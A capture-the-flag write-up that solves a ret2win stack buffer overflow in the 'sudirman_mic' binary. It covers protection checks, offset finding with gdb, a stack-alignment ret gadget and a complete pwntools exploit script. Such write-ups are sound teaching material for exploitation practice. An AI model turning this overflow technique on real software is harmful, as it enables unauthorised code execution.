Sudirman Microphone Tuner

Category: pwn

Description

Sudirman? Mikrofon pun boleh jadi senjata.

Solution

Step 1: Understanding the binary

$ file sudirman_mic
sudirman_mic: ELF 64-bit LSB executable, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, BuildID[sha1]=094ce005b55fa2f95542fa2e2dce6aae42bf9722, for GNU/Linux 3.2.0, not stripped

Step 2: Security protections

I don’t have checksec, so I use rabin2:

$ rabin2 -I sudirman_mic

Canary: disabled → No stack protection; we can overwrite RIP.

NX: disabled → Stack is executable (not needed here, but interesting).

PIE: disabled → Code is loaded at a fixed base (0x400000), so addresses are static.

RELRO: partial → GOT is still writable.

This is a straightforward ret2win challenge. No canary, no PIE, so we just need to overwrite RIP.

Step 3: Running the program

$ ./sudirman_mic

Step 4: Reverse Engineering

We open it with Radare2 (r2):

$ r2 sudirman_mic
[0x004010d0]> afl

Key functions:

• mic_input: allocates a 64-byte stack buffer, but reads 0x80 (128) bytes → classic stack overflow.

• secret_song at 0x40121b: prints the flag.

So, the plan: overflow the buffer in mic_input and redirect RIP to secret_song.

Step 5: Finding offset

Using gdb, we generate a unique pattern:

$ gdb ./sudirman_mic
gef> pattern create 200

We then run the binary and provide the pattern as input:

gef> run
... crash happens ...
gef> pattern offset <crashed_value>

Offset is 72 (64-byte buffer + 8-byte saved RBP).

Step 6: Exploit

At first, I tried:

payload = b"A"*72 + p64(0x40121b)

...but it crashed.

Why? Stack alignment

On x86-64, the stack must be 16-byte aligned before a function call. Jumping straight to secret_song misaligns the stack, causing printf inside it to crash.

To fix this, we insert a single ret gadget (0x40101a) before secret_song. This realigns the stack and makes the call succeed.

Why not hardcode the address?

Even though PIE is off and secret_song is always at 0x40121b, the binary actually prints out the function’s address at runtime (a “leak”). My exploit reads that line and uses it directly. This makes the script work reliably.

Final exploit

from pwn import *

HOST = "your_host"
PORT = your_port

p = remote(HOST, PORT)

# Step 1: grab leak
p.recvuntil(b'at ')
leak = int(p.recvline().strip(), 16)
log.success(f"secret_song @ {hex(leak)}")

# Step 2: build payload
offset = 72
RET = 0x40101a                # stack alignment gadget
payload = b"A" * offset + p64(RET) + p64(leak) + b"\n"

# Step 3: send exploit
p.recvuntil(b'lyrics:')
p.send(payload)

# Step 4: read flag
out = p.recvall(timeout=3)
print(out.decode(errors='ignore'))

With this payload, the overflow overwrites RIP with [RET → secret_song]. The program then executes secret_song and prints the flag.

Flag